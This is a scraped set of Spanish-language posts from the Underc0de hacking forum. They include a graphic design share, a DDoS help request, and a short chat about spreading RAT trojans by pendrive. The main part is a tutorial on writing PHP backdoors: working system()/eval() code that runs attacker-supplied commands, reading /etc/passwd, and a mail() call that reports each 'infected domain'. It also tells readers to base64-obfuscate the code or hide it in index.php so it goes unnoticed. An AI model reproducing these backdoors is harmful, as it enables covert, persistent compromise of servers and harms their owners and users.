Hacía ya unos meses que no diseñaba algo en condiciones, y lo que he diseñado hoy ha sido pura casualidad.. Buscando en google me he encontrado con un fondo "Jester" y bueno, pues la he recortado un poco, he bordeado las esquinas y le he aplicado un desenfoque gaussiano, y el texto le he añadido un degradado blanco/gris claro y un enfoque con sombra paralela -90º y reducción de opacidad..

Después de todo eso ha salido esto:


¡Espero que les guste, Underc0deanos! y espero vuestras críticas.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bueno hoy volvia de las recuperaciones de mi instituto, y como és normal llegue encendí el ordena inicie sesión a skype y de repente se me va la conexión, bueno hasta todo me parecía normal conecte unos cables de ethernet y ya pero de pronto veo skype y veo que alguien me habla diciendo en ingles ''Un negrata me dijo que le intentastes DOSEAR con una booter de 5 dolares y aqui estoy yo el listillo''.
Bueno cuando me dijo esto ya estaba completamente seguro que era un DDoS a mi router asi que me gustaria saber como mitigar este ataque, tambien me bloqueo la entrada a páginas web ya que cuando intentaba entrar a google me redirigia a la administración de router en la pagina inicial con un codigo que creo que enviaba la contraseña a una pagina web era codigo php como no sabía que hacer encendi el APATEDNS y el WIRESHARK para capturar el tráfico quisiera saber como arreglarlo y si puedo hacer algo con la infromación que tengo en los dos programas
Lo gracioso de esto es que yo no he doseado a nadie jajajaaj

Gracias Saludos Meteor

No sé si has doseado o no, según mencionas no.. Pero bueno, esto pasa si tocas esos temas.

Curioso mensaje te dejó el Sr Hacker

CitarUn negrata me dijo que le intentastes DOSEAR con una booter de 5 dolares y aqui estoy yo el listillo

Cuando conectas el cable de Ethernet tienes que ir a la puerta de enlace (que es a donde te lleva por defecto cuando te atacan el router o por problemas técnicos), una vez alli debes acceder al panel, dependiendo de tu compañía tendrás un user y una pass diferente, yo por ejemplo tengo user y pass de mi router, (soy Jazztel) y cuando andes dentro te da diferentes opciones, y ya ahi me pierdo, no recuerdo que tenias que hacer.

Si no me equivoco, esto es un acto ilegal por parte del "Sr Hacker Pro" aparte de estár difamando algo sobre tí, está lanzando peticiones a tu router, siempre lo puedes denunciar o llamar a la centralita a que venga un técnico a reparar tu router.

Hola Underc0deanos, en este post hablaré sobre técnicas para tener un archivo ya sea .PHP ó .HTML a nuestro control. No me hago responsable sobre el uso que le den a este post. Solo lo hago por cuestiones educativas y éticas.

Para el que no sepa que es un Backdoor, cito a mi amiga la Wikipedia.

Citaruna puerta trasera (o en inglés backdoor), en un sistema informático es una secuencia especial dentro del código de programación, mediante la cual se pueden evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema.

---

Temario de funciones
1-System()
2-Variable Global $_SERVER[]
2.1- $_SERVER['REMOTE_ADDR']
2.2-$_SERVER['PHP_SELF']
2.3-$_SERVER['SERVER_NAME']
3-mail()
4-eval()

System()
No dudo que ya conozcas está función ya que es la más conocida para estos temas.

Para poder usarla solo debemos declarar:

Citar

<?php
system('comando');
?>

¿Y si se nos ocurre usar $_GET o $_POST para poder ejecutar el comando que queramos?

Citar

<?php
$var = @system($_GET['ejec']);
?>

Podriamos entrar desde:

CitarNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta

un ejemplo así:

CitarNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta /etc/passwd

y nos mostraría el etc/passwd o podemos poner con cualquier comando, depende el servidor
dependeran los comandos, es decir si tiene linux son comandos linux y si tiene windows pues son
comandos windows, :genius:

Si no están 100% familiarizados con linux les dejo unos comandos que podrian servirles:
Mover un archivo: mv archivo /carpeta/
Renombrar un archivo: mv archivo archivorenombrado
Crear un archivo: touch archivo
Descargar archivos: wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (Se descargará un archivo lol.txt)
Eliminar un archivo: rm archivo
Copiar un archivo: cp archivo archivocopiado

Variable global $_SERVER
$_SERVER['REMOTE_ADDR'] – Muestra la ip de el usuario que está abriendo el script

Ejemplo:

Citar

<?php
echo 'tu IP es'.$_SERVER['REMOTE_ADDR'];
?>

Mostrará la IP de quien lo abra.
$_SERVER['PHP_SELF']- Muestra la ruta en el que se está ejecutando el script.

Ejemplo:

Citar

<?php
echo 'Este archivo esta en'.$_SERVER['PHP_SELF'];
?>

Mostrará la ruta de el script, es decir si estamos en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta te mostrara /hola/lol.php
$_SERVER['SERVER_NAME'] – Muestra el dominio en el que se está ejecutando el script.

Ejemplo:

Citar

<?php
echo 'Estamos en el dominio '.$_SERVER['SERVER_NAME'];
?>

Te mostrará en la pantalla Estamos en el dominio No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Mail()
Está función sirve para enviar un mail.

Modo de uso:
mail('Para', 'Asunto', 'Contenido')
NOTA: Esto se puede almacenar en variables pero como he dicho no estoy enseñando a programar PHP.

Entonces si yo pongo en un script:

Citar

<?php
mail('[email protected]', 'Hola', 'Hola mucho gusto soy'.$_SERVER['REMOTE_ADDR);
?>

Al momento de que alguen entre me enviara un email con el asunto Hola y con el contenido "Hola
mucho gusto soy y una IP".

Bueno ya lo que sigue es a su imaginación, lo que deseen hacer.

eval()
Bien, ahora les explicaré está función. Eval es parecida a system con la diferencia en que system ejecuta comandos en el sistema y eval ejecuta código PHP.

Un claro ejemplo de uso.

Citar

<?php
$var = eval("echo 'hola underc0de';");
?>

Si lo ejecutamos veremos que nos mostrará: hola underc0de. Al igual que system() la podemos usar con $_GET ó $_POST de la misma forma.

Ejemplo:

Citar

<?php
$var eval($_GET['ejec']);
?>

lo usamos de está forma:

CitarNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta 'hola';

y miren que claramente nos ejecutará hola.
Bueno si no están muy familiarizados con PHP está ultima función no les ayudará tanto (y si ponen el code de una shell).

Creando nuestros backdoors.
Un backdoor que ejecute comandos en un sistema pero que nos avise por email cuando alguiien haya visitado este script.

Citar

<?php
$var = system($_POST['ejec');
$domain = $_SERVER['SERVER_NAME'];
$ruta = $_SERVER['PHP_SELF'];
mail('[email protected]', 'Nuevo dominio infectado', $domain.$ruta);
?>

Son 4 lineas que podemos incluir en cualquier script, si ponemos estas 4 lineas dentro de una shell y despues encriptamos todo en base64... ¿Quíen se dará cuenta? O también podemos incluir estas lineas digamos en el archivo index.php, asi si nos borran una shell seguimos teniendo acceso al servidor.

Citar

<?php
$var = eval($_POST['ejec');
$domain = $_SERVER['SERVER_NAME'];
$ruta = $_SERVER['PHP_SELF'];
mail('[email protected]', 'Nuevo dominio infectado', $domain.$ruta);
?>

Bueno hay muchas, muchas formas de darle provecho a estas funciones, Yo solo explique dos.
Usen la imaginación.

---

Saludos, Payasako.
Viejo pdf

CitarCreo que también es mala costumbre pensar que cuando usan la palabra "virus" se asimila con un troyano, sabiendo los diferentes tipos de virus que existen

Exacto, hay muchos tipos de "virus" no siempre tiene por qué ser un troyano..

CitarSi no esta conectado a internet, aunque lo infecte ¿por donde se conecta a la víctima xD?

Desafortunadamente, todavía hay amigos que te pueden colar un server metido en un pen lo que hace que la víctima sin conexión a internet al ejecutar el server sea infectado, o en un pen se puede hacer un autoejecutable. No tiene nada que ver que esté conectado o no a internet para que le puedan infectar desde un pendrive.

Haber, te pongo un ejemplo; Yo tengo un RAT y hago el troyanito con el nombre "ejemplo.exe", si ese archivo lo meto en un pendrive y lo paso a un amigo, aunque mi amigo no tenga conexión a internet, puede ejecutarlo y quedar infectado.